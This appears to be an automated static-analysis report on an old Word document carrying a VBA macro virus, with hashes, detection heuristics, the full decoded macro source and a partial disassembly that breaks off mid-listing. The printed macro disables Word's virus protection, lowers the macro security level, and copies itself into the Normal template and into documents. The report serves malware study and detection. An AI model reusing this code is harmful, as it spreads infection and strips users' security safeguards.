Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13a31331c076e5c7…

MALICIOUS

Office (OLE)

35.0 KB Created: 1997-06-19 09:44:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f8b60886f4ce1746b9b74676b9195909 SHA-1: 56cd2fc263ce28e2be567ae43e32968d8f4c00d8 SHA-256: 13a31331c076e5c73279484e6810e392d235d6ed6d1d19638d908317def14458
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening. The macro attempts to write a temporary file to the system's TEMP directory and then injects code into it. The ClamAV detection of 'Win.Trojan.Psycho-3' further supports its malicious nature. The macro's obfuscation and dynamic file naming make precise IOC extraction challenging, but the temporary file path is identified.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5804 bytes
SHA-256: 3bf3ef92f4135de364537ea1c66a0118204ba6692916c9a1bcf813530c658054
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shadow
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = (0)
Options.SaveNormalPrompt = (0)
Application.DisplayAlerts = (0)
Application.ScreenUpdating = (0)
Application.EnableCancelKey = (0)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
γ = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot") & ".\TEMP\"
Do While FileLen(γ & System.ProfileString("", "DefaultFileName")) = 0
Randomize: α = "~WR00000.TMP"
Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65))
Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
Open γ & α For Input As #1
For η = 1 To 4: Line Input #1, �: Next: η = ""
Do Until ι = "'�"
Line Input #1, ι
η = η & ι & Chr(13) & Chr(10)
Loop: Close #1
Open γ & α For Output As #1: Print #1, η: Close #1
System.ProfileString("", "DefaultFileName") = α: Loop
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
If α.CodeModule.CountOfLines > 0 Or ActiveDocument.Path = "" Then Exit Sub
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'�


' Processing file: /opt/analyzer/scan_staging/348bfa2dfb20438fb73a088c1cdb0275.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3547 bytes
' Line #0:
' 	QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Shadow"
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #7:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #8:
' 	LitDI4 0x0001 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #9:
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x000A "SystemRoot"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0007 ".\TEMP\"
' 	Concat 
' 	St γ 
' Line #10:
' 	Ld γ 
' 	LitStr 0x0000 ""
' 	LitStr 0x000F "DefaultFileName"
' 	Ld System 
' 	ArgsMemLd ProfileString 0x0002 
' 	Concat 
' 	ArgsLd FileLen 0x0001 
' 	LitDI2 0x0000 
' 	Eq 
' 	DoWhile 
' Line #11:
' 	ArgsCall Read 0x0000 
' 	BoS 0x0000 
' 	LitStr 0x000C "~WR00000.TMP"
' 	St α 
' Line #12:
' 	LitDI2 0x001A 
' 	Ld Rnd 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0041 
' 	Add 
' 	FnInt 
' 	ArgsLd Chr 0x0001 
' 	Ld α 
' 	LitDI2 0x0004 
' 	LitDI2 0x0001 
' 	Mid 
' Line #13:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	Ld α 
' 	LitDI2 0x0008 
' 	LitDI2 0x0001 
' 	Mid 
' Line #14:
' 	Ld γ 
' 	Ld α 
' 	Concat 
' 	Paren 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #15:
' 	Ld γ 
' 	Ld α 
' 	Concat 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #16:
' 	StartForVariable 
' 	Ld η 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0004 
' 	For 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Ld � 
' 	LineInput 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St η 
' Line #17:
' 	Ld ι 
' 	LitStr 0x0002 "'�"
' 	Eq 
' 	DoUnitil 
' Line #18:
' 	LitDI2 0x00
... (truncated)